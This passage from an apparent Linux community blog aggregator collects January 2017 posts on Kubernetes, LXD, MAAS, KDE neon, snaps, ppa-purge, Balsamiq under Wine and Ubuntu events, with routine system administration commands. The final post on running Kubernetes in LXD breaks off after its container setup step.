January 24, 2017

We’re proud to announce support for Kubernetes 1.5.2 in the Canonical Distribution of Kubernetes. This is a pure upstream distribution of Kubernetes, designed to be easily deployable to public clouds, on-premises environments (e.g. vSphere, OpenStack), bare metal, and developer laptops. Kubernetes 1.5.2 is a patch release consisting mostly of bugfixes, and we encourage you to check out the release notes.

Getting Started:

Here’s the simplest way to get a Kubernetes 1.5.2 cluster up and running on an Ubuntu 16.04 system:

sudo apt-add-repository ppa:juju/stable
sudo apt-add-repository ppa:conjure-up/next
sudo apt update
sudo apt install conjure-up
conjure-up kubernetes

During the installation, conjure-up will ask which cloud you want to deploy on and prompt you for the proper credentials. If you’re deploying to local containers (LXD), see these instructions for localhost-specific considerations.

For production-grade deployments and cluster lifecycle management, we recommend reading the full Canonical Distribution of Kubernetes documentation.

Home page: https://jujucharms.com/canonical-kubernetes/

Source code: https://github.com/juju-solutions/bundle-canonical-kubernetes

How to upgrade

With your Kubernetes model selected, you can upgrade your cluster by redeploying the bundle, provided you are on the 1.5.x series of Kubernetes. At this time, releases before 1.5.x have not been tested. Depending on which bundle you previously deployed, run:

juju deploy canonical-kubernetes

or

juju deploy kubernetes-core

If you have made tweaks to your deployment bundle, such as deploying additional worker nodes under a different label, you will need to upgrade the components manually. The following command list assumes you have made no tweaks, but it can be modified to work for your deployment.

juju upgrade-charm kubernetes-master
juju upgrade-charm kubernetes-worker
juju upgrade-charm etcd
juju upgrade-charm flannel
juju upgrade-charm easyrsa
juju upgrade-charm kubeapi-load-balancer

This will upgrade the charm code and resources to the Kubernetes 1.5.2 release of the Canonical Distribution of Kubernetes.
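
Once those commands complete, a quick sanity check is to look at the model; a minimal sketch (output will vary with your deployment):

juju status

The application version column should report 1.5.2 once all units have settled.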

New features:

  • Full support for Kubernetes v1.5.2.

General Fixes

  • #151 #187 It wasn’t very transparent to users that they should be using conjure-up for local development; conjure-up is now the de facto mechanism for deploying CDK.

  • #173 Resolved permissions on ~/.kube on kubernetes-worker units

  • #169 Tuned the verbosity of the AddonTacticManager class during charm layer build process

  • #162 Added NO_PROXY configuration to prevent routing all requests through configured proxy [by @axinojolais]

  • #160 Resolved an error flannel sometimes encountered during cni-relation-changed [by @spikebike]

  • #172 Resolved sporadic timeout issues between worker and apiserver due to nginx connection buffering [by @axinojolais]

  • #101 Worked around offline installs attempting to contact PyPI to install docker-compose

  • #95 Tuned verbosity of copy operations in the debug script for debugging the debug script.

Etcd layer-specific changes

  • #72 #70 Resolved a certificate-relation error where etcdctl would attempt to contact the cluster master before services were ready [by @javacruft]

Unfiled/un-scheduled fixes:

  • #190 Removal of assembled bundles from the repository. See bundle author/contributors notice below

Additional Feature(s):

  • We’ve open sourced the release management scripts we use in a Juju-deployed Jenkins model. These scripts capture the logic we had been running by hand and give users a clear view into how we build, package, test, and release the CDK. You can find them in the juju-solutions/kubernetes-jenkins repository. This is early work and will continue to be iterated on and documented as we push towards the Kubernetes 1.6 release.

Notice to bundle authors and contributors:

The fix for #190 is a larger change that has landed in the bundle-canonical-kubernetes repository. Instead of maintaining several copies of a single use-case bundle across several repositories, we are now assembling the CDK-based bundles from fragments (unofficial nomenclature).

This affords us the freedom to rapidly iterate on a CDK-based bundle and include partner technologies, such as different SDN vendors, storage backend components, and other integration points. It keeps our CDK bundle succinct while allowing more complex solutions to be assembled easily, reliably, and repeatably. This does change the contribution guidelines for end users.

Any changes to the core bundle should be placed in the respective fragment under the fragments directory. Once the change has been merged, the primary published bundles can be assembled by running ./bundle in the root of the repository. This process is outlined in the repository README.md.
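
As a rough sketch of that workflow (assuming ./bundle runs with no arguments; check the README.md for the exact invocation):

git clone https://github.com/juju-solutions/bundle-canonical-kubernetes.git
cd bundle-canonical-kubernetes
# edit or add the relevant fragment under fragments/, then reassemble:
./bundle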

We look forward to feedback on how opaque or transparent this process is, and whether it has useful applications outside of our own release management. The ./bundle Python script is still very much geared towards our own release process and assembling bundles targeted at the CDK. However, we’re open to generalizing it and encourage feedback and contributions to make it more useful to more people.

How to contact us:

We’re normally found in these Slack channels and attend these SIG meetings regularly:

Operators are an important part of Kubernetes, and we encourage you to participate with other members of the Kubernetes community!

We also monitor the Kubernetes mailing lists and other community channels; feel free to reach out to us. As always, PRs, recommendations, and bug reports are welcome: https://github.com/juju-solutions/bundle-canonical-kubernetes

on January 24, 2017 03:28 PM

Recently, I have had the pleasure of working with a fantastic company called Endless who are building a range of computers and a Linux-based operating system called Endless OS.

My work with them has primarily involved community and product development for an initiative that integrates functionality into the operating system to teach you how to code. This provides a powerful platform where you can learn to code and easily hack on applications.

If this sounds interesting to you, I created a short video demo where I show off their Mission hardware as well as run through a demo of Endless Code in action. You can see it below:

I would love to hear what you think and how Endless Code can be improved in the comments below.

The post Endless Code and Mission Hardware Demo appeared first on Jono Bacon.

on January 24, 2017 12:35 PM

Welcome to the Ubuntu Weekly Newsletter. This is issue #495 for the weeks January 9 – 22, 2017, and the full version is available here.

In this issue we cover:

This issue of The Ubuntu Weekly Newsletter is brought to you by:

  • Elizabeth K. Joseph
  • Chris Guiver
  • Paul White
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution ShareAlike 3.0 License.

on January 24, 2017 02:24 AM

January 23, 2017

Big Software, IoT and Big Data are changing how organisations are architecting, deploying, and managing their infrastructure. Traditional models are being challenged and replaced by software solutions that are deployed across many environments and many servers. However, no matter what infrastructure you have, there are bare metal servers under it, somewhere.

Organisations are looking for more efficient ways to balance their hardware and infrastructure investments with the efficiencies of the cloud. Canonical’s MAAS (Metal As A Service) is one such technology. MAAS is designed for DevOps at scale, in places where bare metal is the best way to run your applications. Big data, private cloud, PaaS and HPC all thrive on MAAS. Hardware has always been an expensive and difficult resource to deploy within a data centre, yet it is still a major consideration for any organisation moving all or part of its infrastructure to the cloud. To become more cost-effective, many organisations hire teams of developers to cobble together software solutions that solve functional business challenges while leveraging existing legacy hardware, in the hope of offsetting the need to buy and deploy more hardware-based solutions.

MAAS isn’t a new concept, but demand and adoption rates are growing because many enterprises want to combine the flexibility of cloud services with the raw power of bare metal servers to run high-power, scalable workloads. For example, when a new server needs to be deployed, MAAS automates most, if not all, of the provisioning process. Automation makes deploying solutions much quicker and more efficient because it allows tedious tasks to be performed faster and more accurately without human intervention. Even with proper and thorough documentation, manually deploying a server to run web services or Hadoop, for example, could take hours, compared to a few minutes with MAAS.

Forward thinking companies are leveraging server provisioning to combine the flexibility of the cloud with the power and security of hardware. For example:

  • High Performance Computing organisations are using MAAS to modernise how they deploy and allocate servers quickly and efficiently.
  • Smart data centres are using MAAS to multi-purpose their server usage, improving efficiency and ensuring servers do not go underutilised.
  • Hybrid cloud providers leverage MAAS to provide extra server capacity during peak demand times and between various public cloud providers.

This ebook, Server Provisioning: What Network Admins & IT Pros Need to Know, outlines how innovative companies are leveraging MAAS to get more out of their hardware investment while making their cloud environments more efficient and reliable. Smart IT pros know that going to the cloud does not mean having to rip and replace their entire infrastructure to take advantage of the opportunities the cloud offers. Canonical’s MAAS is a mature solution that helps organisations take full advantage of their cloud and legacy hardware investments.

Get started with MAAS

To download and install MAAS for free, please visit ubuntu.com/download/server-provisioning, or to talk to one of our scale-out experts about deploying MAAS in your datacenter, contact us. For more information, please download our free eBook on MAAS.
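
If you already run Ubuntu 16.04 and just want to experiment, a minimal sketch to install MAAS from the archive (a production deployment needs further configuration than this):

sudo apt update
sudo apt install maas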

Download eBook

on January 23, 2017 01:30 PM


January 21, 2017

When you download a KDE neon ISO you get transparently redirected to one of the mirrors that KDE uses. Recently the Polish mirror was marked as unsafe in Google Safe Browsing, an extremely popular service used by most web browsers and anti-virus software to check whether a site is problematic. I expect there was a problem elsewhere on this mirror, but it certainly wasn’t KDE neon. KDE sysadmins have tried to contact the mirror and Google.

You can verify any KDE neon installable image by checking the GPG signature against the KDE neon ISO Signing Key. This is the .sig file that sits alongside all the .iso files.

gpg2 --recv-key '348C 8651 2066 33FD 983A 8FC4 DEAC EA00 075E 1D76'

wget http://files.kde.org/neon/images/neon-useredition/current/neon-useredition-current.iso.sig

gpg2 --verify neon-useredition-current.iso.sig
gpg: Signature made Thu 19 Jan 2017 11:18:13 GMT using RSA key ID 075E1D76
gpg: Good signature from "KDE neon ISO Signing Key <neon@kde.org>" [full]
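
Note that gpg2 --verify expects the ISO itself to sit next to the .sig file, so fetch it first; the image lives at the same mirror path as the signature:

wget http://files.kde.org/neon/images/neon-useredition/current/neon-useredition-current.iso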

Adding a sensible GUI to do this is future work and fairly tricky to do in a secure way but hopefully soon.

on January 21, 2017 12:18 AM

January 20, 2017

You voted for change and today we’re bringing change. Today we give back the installer to the people. Today Calamares 3 was released.

It’s been a long-standing wish of KDE neon to switch to the Calamares installer.  Calamares is a distro-independent installer used by various projects such as Netrunner and Tanglu.  It’s written in Qt and KDE Frameworks and has modules in C++ or Python.

Today I’ve switched the Developer Unstable edition to Calamares and it seems to work pretty nicely.

However, a few features are missing compared to the previous Ubiquity installer.  OEM mode might be in there but needs me to add some integration for it.  Restricted codecs install should be easy to add.  LUKS-encrypted hard disks are there but also need some integration from me.  Encrypted home folders aren’t there and should be added.  Updating to the latest packages on install should also be added.  It does seem to work with UEFI computers, but not with Secure Boot yet. Let me know if you spot any others.

I’ve only tested this on a simple virtual machine, so give it a try and see what breaks. Or if you want to switch back, run apt install ubiquity-frontend-kde ubiquity-slideshow-neon.

(Screenshots: the Calamares installer running on the KDE neon Developer Unstable edition.)

on January 20, 2017 06:23 PM

Snapping DBus

Harald Sitter

For the past couple of months I’ve been working on getting KDE applications into the binary bundle format snap.

With the release of snapd 2.20 last month, snapd gained a much-needed feature enabling easy bundling of applications that register a DBus service name. The all-new dbus interface makes this super easy.

Being able to easily register a DBus service matters a great deal because an extraordinary amount of KDE’s applications are doing just that. The use cases range from actual inter-process communication to spin-offs from this functionality, such as single-instance behavior and clean application termination via the kquitapp command-line utility.

There’s barely any application that gets by without also claiming its own space on the session bus, so it is a good thing that enabling this is now super easy when building snap bundles.

One simply adds a suitable slot to the snapcraft.yaml and that’s it:

slots:
    session-dbus-interface:
        interface: dbus
        name: org.kde.kmplot
        bus: session

An obvious caveat is that the application needs to claim a well-known name on the bus. For most of KDE’s applications this will happen automatically, as the KDBusAddons framework will claim the correct name, assuming the QCoreApplication properties were set with the relevant data to deduce the organization+app reverse-domain name.

As an additional bonus, in KDE we already tend to codify the used service name in the desktop files via the X-DBUS-ServiceName entry. When writing a snapcraft.yaml, it is easy to figure out whether DBus should be used and what the service name is by simply checking the desktop file.
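
For example, a quick way to look the name up from a shell (the desktop file path here is an assumption; adjust it for your application):

grep X-DBUS-ServiceName /usr/share/applications/org.kde.kmplot.desktop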

The introduction of this feature moves a really big roadblock out of the way for enabling KDE’s applications to be easily snapped and published.

on January 20, 2017 01:47 PM

January 19, 2017

Many people have been scratching their heads wondering what the new US president will really do and what he really stands for. His alternating positions on abortion, for example, suggest he may simply be telling people what he thinks is most likely to win public support from one day to the next. Will he really waste billions of dollars building a wall? Will Muslims really be banned from the US?

As it turns out, several movies provide a thought-provoking insight into what could eventuate. What's more, two of them bear a creepy resemblance to the Trump phenomenon and many of the problems in the world today.

Countdown to Looking Glass

On the classic cold war theme of nuclear annihilation, Countdown to Looking Glass is probably far more scary to watch on Trump eve than in the era when it was made. Released in 1984, the movie follows a series of international crises that have all come to pass: the assassination of a US ambassador in the middle east, a banking crisis and two superpowers in an escalating conflict over territory. The movie even picked a young Republican congressman for a cameo role: he subsequently went on to become speaker of the house. To relate it to modern times, you may need to imagine it is China, not Russia, who is the adversary but then you probably won't be able to sleep after watching it.

cleaning out the swamp?

The Omen

Another classic is The Omen. The star of this series of four horror movies, Damien Thorn, appears to have a history that is eerily reminiscent of Trump: born into a wealthy family, a series of disasters befall every honest person he comes into contact with, he comes to control a vast business empire acquired by inheritance and as he enters the world of politics in the third movie of the series, there is a scene in the Oval Office where he is flippantly advised that he shouldn't lose any sleep over any conflict of interest arising from his business holdings. Did you notice Damien Thorn and Donald Trump even share the same initials, DT?

on January 19, 2017 07:31 PM

UbuCons are a remarkable achievement from the Ubuntu community: a network of conferences across the globe, organized by volunteers passionate about Open Source and about collaborating, contributing, and socializing around Ubuntu. UbuCon Summit at SCALE 15x is the next in the impressive series of conferences.

UbuCon Summit at SCALE 15x takes place in Pasadena, California on March 2nd and 3rd during the first two days of SCALE 15x. Ubuntu will also have a booth at SCALE's expo floor from March 3rd through 5th.

We are putting together the conference schedule and are announcing a call for papers. While we have some amazing speakers and an always-vibrant unconference schedule planned, it is the community, as always, who make UbuCon what it is—just as the community sets Ubuntu apart.

Interested speakers who have Ubuntu-related topics can submit their talk to the SCALE call for papers site. UbuCon Summit has a wide range of both developers and enthusiasts, so any interesting topic is welcome, no matter how casual or technical. The SCALE CFP form is available here:

http://www.socallinuxexpo.org/scale/15x/cfp

Over the next few weeks we’ll be sharing more details about the Summit, revamping the global UbuCon site and updating the SCALE schedule with all relevant information.

http://www.ubucon.org/

About SCaLE:

SCALE 15x, the 15th Annual Southern California Linux Expo, is the largest community-run Linux/FOSS showcase event in North America. It will be held from March 2-5 at the Pasadena Convention Center in Pasadena, California. For more information on the expo, visit https://www.socallinuxexpo.org

on January 19, 2017 10:12 AM

January 18, 2017

LXD on Debian (using snapd)

Stéphane Graber

LXD logo

Introduction

So far, all my blog posts about LXD have assumed an Ubuntu host with LXD installed from packages, as a snap or from source.

But LXD is perfectly happy to run on any Linux distribution which has the LXC library available (version 2.0.0 or higher), a recent kernel (3.13 or higher) and some standard system utilities available (rsync, dnsmasq, netcat, various filesystem tools, …).

In fact, you can find packages in the following Linux distributions (let me know if I missed one):

We have also had several reports of LXD being used on CentOS and Fedora, where users built it from source using the distribution’s liblxc (or, in the case of CentOS, from an external repository).

One distribution we’ve seen a lot of requests for is Debian. A native Debian package has been in the works for a while now and the list of missing dependencies has been shrinking quite a lot lately.

But there is an easy alternative that will get you a working LXD on Debian today!
Use the same LXD snap package as I mentioned in a previous post, but on Debian!

Requirements

  • A Debian “testing” (stretch) system
  • The stock Debian kernel without apparmor support
  • If you want to use ZFS with LXD, then the “contrib” repository must be enabled and the “zfsutils-linux” package installed on the system

Installing snapd and LXD

Getting the latest stable LXD onto an up to date Debian testing system is just a matter of running:

apt install snapd
snap install lxd

If you have never used snapd before, you’ll have to either log out and back in to update your PATH, or just update your existing one with:

. /etc/profile.d/apps-bin-path.sh

And now it’s time to configure LXD with:

root@debian:~# lxd init
Name of the storage backend to use (dir or zfs) [default=dir]:
Create a new ZFS pool (yes/no) [default=yes]?
Name of the new ZFS pool [default=lxd]:
Would you like to use an existing block device (yes/no) [default=no]?
Size in GB of the new loop device (1GB minimum) [default=15]:
Would you like LXD to be available over the network (yes/no) [default=no]?
Would you like stale cached images to be updated automatically (yes/no) [default=yes]?
Would you like to create a new network bridge (yes/no) [default=yes]?
What should the new bridge be called [default=lxdbr0]?
What IPv4 subnet should be used (CIDR notation, “auto” or “none”) [default=auto]?
What IPv6 subnet should be used (CIDR notation, “auto” or “none”) [default=auto]?
LXD has been successfully configured.

And finally, you can start using LXD:

root@debian:~# lxc launch images:debian/stretch debian
Creating debian
Starting debian

root@debian:~# lxc launch ubuntu:16.04 ubuntu
Creating ubuntu
Starting ubuntu

root@debian:~# lxc launch images:centos/7 centos
Creating centos
Starting centos

root@debian:~# lxc launch images:archlinux archlinux
Creating archlinux
Starting archlinux

root@debian:~# lxc launch images:gentoo gentoo
Creating gentoo
Starting gentoo

And enjoy your fresh collection of Linux distributions:

root@debian:~# lxc list
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
|   NAME    |  STATE  |         IPV4          |                     IPV6                      |    TYPE    | SNAPSHOTS |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
| archlinux | RUNNING | 10.250.240.103 (eth0) | fd42:46d0:3c40:cca7:216:3eff:fe40:7b1b (eth0) | PERSISTENT | 0         |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
| centos    | RUNNING | 10.250.240.109 (eth0) | fd42:46d0:3c40:cca7:216:3eff:fe87:64ff (eth0) | PERSISTENT | 0         |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
| debian    | RUNNING | 10.250.240.111 (eth0) | fd42:46d0:3c40:cca7:216:3eff:feb4:e984 (eth0) | PERSISTENT | 0         |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
| gentoo    | RUNNING | 10.250.240.164 (eth0) | fd42:46d0:3c40:cca7:216:3eff:fe27:10ca (eth0) | PERSISTENT | 0         |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+
| ubuntu    | RUNNING | 10.250.240.80 (eth0)  | fd42:46d0:3c40:cca7:216:3eff:fedc:f0a6 (eth0) | PERSISTENT | 0         |
+-----------+---------+-----------------------+-----------------------------------------------+------------+-----------+

Conclusion

The availability of snapd on other Linux distributions makes it a great way to get the latest LXD running on your distribution of choice.

There are still a number of problems with the LXD snap which may or may not be a blocker for your own use. The main ones at this point are:

  • All containers are shutdown and restarted on upgrades
  • No support for bash completion

If you want non-root users to have access to the LXD daemon, simply make sure that a “lxd” group exists on your system, add whoever you want to manage LXD into that group, then restart the LXD daemon.
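
As a minimal sketch (the snap’s systemd unit name is an assumption; check systemctl if it differs on your system):

sudo groupadd --system lxd              # only needed if the group is missing
sudo usermod -aG lxd "$USER"
sudo systemctl restart snap.lxd.daemon
newgrp lxd                              # pick up the new group in this shell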

Extra information

The snapd website can be found at: http://snapcraft.io

The main LXD website is at: https://linuxcontainers.org/lxd
Development happens on Github at: https://github.com/lxc/lxd
Mailing-list support happens on: https://lists.linuxcontainers.org
IRC support happens in: #lxcontainers on irc.freenode.net
Try LXD online: https://linuxcontainers.org/lxd/try-it

on January 18, 2017 10:19 PM

January 17, 2017

Suppose you added a third-party repository of DEB packages to your Ubuntu system and you now want to remove it completely, either by downgrading the packages to the official versions in Ubuntu or by removing them altogether. How do you do that?

Well, if it was a Personal Package Archive (PPA), you would simply use ppa-purge. ppa-purge is not pre-installed in Ubuntu, so we install it with

sudo apt update
sudo apt install ppa-purge

Here is the help for ppa-purge:

$ ppa-purge
Warning:  Required ppa-name argument was not specified
Usage: sudo ppa-purge [options] <ppa:ppaowner>[/ppaname]

ppa-purge will reset all packages from a PPA to the standard
versions released for your distribution.

Options:
    -p [ppaname]        PPA name to be disabled (default: ppa)
    -o [ppaowner]        PPA owner
    -s [host]        Repository server (default: ppa.launchpad.net)
    -d [distribution]    Override the default distribution choice.
    -y             Pass -y --force-yes to apt-get or -y to aptitude
    -i            Reverse preference of apt-get upon aptitude.
    -h            Display this help text

Example usage commands:
    sudo ppa-purge -o xorg-edgers
    will remove https://launchpad.net/~xorg-edgers/+archive/ppa

    sudo ppa-purge -o sarvatt -p xorg-testing
    will remove https://launchpad.net/~sarvatt/+archive/xorg-testing

    sudo ppa-purge [ppa:]ubuntu-x-swat/x-updates
    will remove https://launchpad.net/~ubuntu-x-swat/+archive/x-updates

Notice: If ppa-purge fails for some reason and you wish to try again,
(For example: you left synaptic open while attempting to run it) simply
uncomment the PPA from your sources, run apt-get update and try again.

Here is an example of using ppa-purge to remove a PPA. Suppose we want to completely uninstall the Official Wine Builds PPA. The URI of the PPA is shown on that page in bold, and it is ppa:wine/wine-builds.

To uninstall this PPA, we run

$ sudo ppa-purge ppa:wine/wine-builds
Updating packages lists
PPA to be removed: wine wine-builds
Package revert list generated:
wine-devel- wine-devel-amd64- wine-devel-i386:i386- winehq-devel-

Disabling wine PPA from
/etc/apt/sources.list.d/wine-ubuntu-wine-builds-xenial.list
Updating packages lists
...
PPA purged successfully
$ _

But how do we completely uninstall the packages of a third-party repository? Such repositories do not have a URI in the format that ppa-purge expects!

Let’s see an example. If you have an Intel graphics card, you may choose to install Intel’s packaged drivers from 01.org. For Ubuntu 16.04, the download page is https://01.org/linuxgraphics/downloads/intel-graphics-update-tool-linux-os-v2.0.2. They provide a tool that you run on your system, and it performs a set of checks. Once those checks pass, it adds the Intel repository for the Intel graphics card drivers. You do not see a PPA-style URI on this page; you need to dig deeper after installing the drivers to find out.

The details of the repository are in /etc/apt/sources.list.d/intellinuxgraphics.list, and it is this single line:

deb https://download.01.org/gfx/ubuntu/16.04/main xenial main #Intel Graphics drivers

How do we figure out the parameters for ppa-purge? These parameters are just used to identify the correct files in /var/lib/apt/lists/. For the case of the Intel drivers, the relevant files in /var/lib/apt/lists are

/var/lib/apt/lists/download.01.org_gfx_ubuntu_16.04_main_dists_xenial_InRelease
/var/lib/apt/lists/download.01.org_gfx_ubuntu_16.04_main_dists_xenial_main_binary-amd64_Packages
/var/lib/apt/lists/download.01.org_gfx_ubuntu_16.04_main_dists_xenial_main_binary-i386_Packages
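
To locate these files on your own system, you can simply filter the package indexes by the repository host (using the Intel host from this example):

ls /var/lib/apt/lists/ | grep download.01.org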

The important ones are the *_Packages files. The source code line in ppa-purge that will help us is

PPA_LIST=/var/lib/apt/lists/${PPAHOST}_${PPAOWNER}_${PPANAME}_*_Packages

Therefore, we select the parameters for ppa-purge accordingly:

-s download.01.org   for   ${PPAHOST}
-o gfx               for   ${PPAOWNER}
-p ubuntu            for   ${PPANAME}

Now ppa-purge can remove the packages from such a repository as well, using these parameters:

sudo ppa-purge -s download.01.org -o gfx -p ubuntu

That’s it!

on January 17, 2017 10:20 PM

January 16, 2017

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In December, about 175 work hours have been dispatched among 14 paid contributors. Their reports are available:

Evolution of the situation

The number of sponsored hours did not increase, but a new silver sponsor is in the process of joining. We are only missing another silver sponsor (or two to four bronze sponsors) to reach our objective of funding the equivalent of a full-time position.

The security tracker currently lists 31 packages with a known CVE and the dla-needed.txt file lists 27. The situation improved a little compared to last month.

Thanks to our sponsors

New sponsors are in bold.


on January 16, 2017 02:39 PM

This post is mostly a mea culpa to all the folks who asked me after a presentation: “And those slides will be online?” The answer is generally “yes”, but they ended up in a tweet or something equally hard to find. Now I finally got around to making an updated presentations page that is actually useful. Hopefully you can find the slides you are looking for there. More importantly, you can use them as a basis for your talk to a local group in your town.

As I was redoing this, I thought it was a bit interesting how my title pages seem to alternate every couple of years between complex and simple. And I think I have a candidate for worst theme (though there was a close second). There is also a favorite theme, along with a reminder of how much fun it is to make a presentation with JessyInk.

I think there are a couple missing that I can’t find, and also video links out on the Internet somewhere. Please drop me a line if you have any ideas or suggestions, or if I sent you files that I’ve now lost. Hopefully this is easier to maintain now, so there won’t be the same delay.

on January 16, 2017 06:00 AM

January 15, 2017

KDE's Google Code-in party is ending once again. The deadline for students to submit work is January 16, 2017 at 09:00 (PST).

Mentors, you have until January 18, 2017 at 09:00 (PST) to evaluate your student's work. Please get that done before the deadline, so that admins don't have to judge the student work.

Then it will be time to choose winners. We need to have our choices in by January 23, 2017 at 09:00 (PST). Winners and Finalists will be announced January 30, 2017 at 09:00 (PST).

To me, this contest has been lovely. Because there are more organizations participating now, there are more tasks for students, and less pressure on each org. It seems that the students have enjoyed themselves as well.

Spencerb said in #kde-soc: "This was my first (and final) GCi, so I don't have much of a point of comparison, but it's been awesome. It's been an opportunity to meet new people and just get involved with KDE, which I've wanted to do for a long time. I've also learned a lot about serious software development that I wouldn't have otherwise.

"I'll turn 18 this Monday, which is why this is my last year :(  I'm so glad to have had the chance to participate at least once."

As a task, Harpreet filed a GCi review: http://aboutgci2016.blogspot.in/

So far, we've had 121 students and 160 completed tasks; the top ten students account for 103 of those. Most exciting for me is the number of beginner tasks completed: 45. Getting kids acquainted with Free and Open Source Software communities is why every organization must have beginner tasks. I'm glad 45 kids got to know KDE a bit.


on January 15, 2017 05:04 AM

January 14, 2017

Balsamiq is one of the best tools for quick wireframes creation. It allows you to efficiently and quickly create mockups that give you an idea of how design elements fit in the page.

Some years ago there was a package available for the most popular Linux distributions, but since Adobe dropped support for Linux and Balsamiq is built on top of Adobe Air, nowadays they don’t support Linux either.

As you can see from the downloads page of Balsamiq, though, it luckily works well with wine.

Install Balsamiq with WINE

First things first: install wine.

sudo apt-get install wine

Now, let’s proceed with an easy step-by-step guide.

  1. Download the Balsamiq Bundle that includes Adobe Air (if the link does not work, head to Balsamiq Downloads and download the version with Adobe Air bundled)
  2. Open a terminal, unzip the bundle and move it to /opt (change the Downloads directory name according to your setup)
    cd Downloads
    unzip Balsamiq*
    sudo mv Balsamiq* /opt
  3. To make life easier, rename the .exe to simply balsamiq.exe
    cd /opt/Balsamiq_Mockups_3/
    mv Balsamiq\ Mockups\ 3.exe balsamiq.exe
  4. Now you can run Balsamiq Mockups by running it with wine
    wine /opt/Balsamiq_Mockups_3/balsamiq.exe

Add Balsamiq as an application

The last, optional step can save you a lot of time launching Balsamiq, because it saves you the hassle of typing the command from step 4 above every time you want to launch it (and remembering the location of the Balsamiq executable). It simply consists in creating a new desktop entry for Balsamiq, which adds it to your operating system’s application list.

Create the file ~/.local/share/applications/Balsamiq.desktop with the following content:

[Desktop Entry]
Encoding=UTF-8
Name=Balsamiq Mockups
Icon=/opt/Balsamiq_Mockups_3/icons/mockups_ico_48.png
Exec=wine /opt/Balsamiq_Mockups_3/balsamiq.exe
Type=Application
Categories=Graphics;

If you are on Ubuntu with Unity, you can add the following lines too:

StartupNotify=false
StartupWMClass=balsamiq.exe
X-UnityGenerated=true

Now, just save the file and have a look at your Dash or Activity Panel to see if it works.
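
If the launcher doesn’t appear, it can help to validate the entry with desktop-file-validate, which ships in the desktop-file-utils package:

desktop-file-validate ~/.local/share/applications/Balsamiq.desktop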

Install Balsamiq Mockups with Play on Linux

Eric suggests using Play on Linux for an easier installation process and reports that Balsamiq Mockups 3 works like a charm for him in that environment. Worth a try!

The post Install Balsamiq Mockups in Debian/Ubuntu appeared first on deshack.

on January 14, 2017 09:16 AM

There are times in standard social interactions when people ask what you do professionally, which means I end up talking about Ubuntu and specifically Ubuntu Phone. Many times that comes down to the seemingly simple question: “Why would I want an Ubuntu phone?” I’ve tried the answer “because I’m a thought leader and you should want to be like me,” but sadly that gets little traction outside of Silicon Valley. Another good answer is all the benefits of Free Software, but many of those are benefits the general public doesn’t yet realize they need.

Ubuntu Phone

The biggest strength and weakness of Ubuntu Phone is that it’s a device without an intrinsic set of services. If you buy an Android device you get Google Services. If you buy an iPhone you get Apple services. While these can be strengths (at least in Google’s case) they are effectively a lock in to services that may or may not meet your requirements. You certainly can get Telegram or Signal for either of those, but they’re never going to be as integrated as Hangouts or iMessage. This goes throughout the device including things like music and storage as well. Ubuntu and Canonical don’t provide those services, but instead provide integration points for any of them (including Apple and Google if they wanted) to work inside an Ubuntu Phone. This means as a user you can use the services you want on your device, if you love Hangouts and Apple Maps, Ubuntu Phone is happy to be a freak with you.

Carriers are also interested in this flexibility. They’re trying to put together packages of data and services that will sell and fetch a premium price (effectively bundling). Some services they may provide themselves and some come from well-known providers; but by not being able to select options for those base services, they have less flexibility in what they can do. Sure, Google and Apple could give them a great price or bundle, but they both realize that they don’t have to. So that effectively makes it difficult for the carriers, as well as alternate service providers (e.g. Dropbox, Spotify, etc.), to compete.

What I find most interesting thing about this discussion is that it is the original reason that Google bought Android. They were concerned that with Apple controlling the smartphone market they’d be in a position to damage Google’s ability to compete in services. They were right. But instead of opening it up to competition (a competition that certainly at the time and even today they’re likely to win) they decided to lock down Android with their own services. So now we see in places like China where Google services are limited there is no way for Android to win, only forks that use a different set of integrations. One has to wonder if Ubuntu Phone existed earlier whether Google would have bought Android, while Ubuntu Phone competes with Android it doesn’t pose any threat to Google’s core businesses.

It is always a failure to try to convince people to change their patterns and devices just for the sake of change. Early adopters are people who enjoy that, but not the majority of people. This means that we need to be an order of magnitude better, which is a pretty high bar to set, but one I enjoy working towards. I think that Ubuntu Phone has the fundamental DNA to win in this race.

on January 14, 2017 06:00 AM

January 13, 2017

LXD logo

Introduction

For those who haven’t heard of Kubernetes before, it’s defined by the upstream project as:

Kubernetes is an open-source system for automating deployment, scaling, and management of containerized applications.

It groups containers that make up an application into logical units for easy management and discovery. Kubernetes builds upon 15 years of experience of running production workloads at Google, combined with best-of-breed ideas and practices from the community.

It is important to note the “applications” part in there. Kubernetes deploys a set of single-application containers and connects them together. Those containers will typically run a single process and so are very different from the full system containers that LXD itself provides.

This blog post will be very similar to one I published last year on running OpenStack inside a LXD container. Similarly to the OpenStack deployment, we’ll be using conjure-up to setup a number of LXD containers and eventually run the Docker containers that are used by Kubernetes.

Requirements

This post assumes you’ve got a working LXD setup, providing containers with network access and that you have at least 10GB of space for the containers to use and at least 4GB of RAM.

Outside of configuring LXD itself, you will also need to bump some kernel limits with the following commands:

sudo sysctl fs.inotify.max_user_instances=1048576  
sudo sysctl fs.inotify.max_queued_events=1048576  
sudo sysctl fs.inotify.max_user_watches=1048576  
sudo sysctl vm.max_map_count=262144
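
These settings do not survive a reboot; to make them permanent you can drop them into a sysctl configuration file (the file name below is an arbitrary choice):

sudo tee /etc/sysctl.d/99-kubernetes-lxd.conf <<EOF
fs.inotify.max_user_instances=1048576
fs.inotify.max_queued_events=1048576
fs.inotify.max_user_watches=1048576
vm.max_map_count=262144
EOF
sudo sysctl --system    # reload all sysctl configuration files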

Setting up the container

Similarly to OpenStack, the conjure-up deployed version of Kubernetes expects a lot more privileges and resource access than LXD would typically provide. As a result, we have to create a privileged container, with nesting enabled and with AppArmor disabled.

This means that not very much of LXD’s security features will still be in effect on this container. Depending on how you feel about this, you may choose to run this on a different machine.

Note that all of this nevertheless remains better than instructions that would have you install everything directly on your host machine, if only by making it very easy to remove it all in the end.

lxc launch ubuntu:16.04 kubernetes -c security.privileged=true -c security.nesting=true -c linux.kernel_modules=ip_tables,ip6_tables,netlink_diag,nf_nat,overlay -c raw.lxc=lxc.aa_profile=unconfined
